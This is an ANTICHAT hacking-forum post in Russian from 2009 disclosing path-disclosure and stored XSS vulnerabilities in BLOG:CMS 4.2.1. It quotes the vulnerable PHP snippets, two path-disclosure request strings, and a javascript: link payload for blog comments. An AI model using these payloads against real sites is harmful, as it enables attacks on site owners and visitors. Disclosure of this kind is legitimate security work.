ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

BLOG:CMS 4.2.1
  #7  
Старый 08.11.2009, 06:03
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию BLOG:CMS 4.2.1

BLOG:CMS v4.2.1
Раскрытие путей
Цитата:
/?query[]=1234&blogid=1
Уязвимой код:
PHP код:
$this->formdata = array(
            
'id' => $blog?$blog->getID():$CONF['DefaultBlog'],
            
'query' => htmlspecialchars(getVar('query')),
        ); 
Цитата:
/photo/index.php?gallery[]=Corvette
Уязвимый код:
PHP код:
$_REQUEST array_map("htmlentities"$_REQUEST); 
Активная XSS
Уязвимость находиться в комментариях к блогу (Его записям).
Цитата:
[a href=javascript:alert();]Free Porno![/a]
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Уязвимости CMS / форумов 49 02.04.2015 17:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.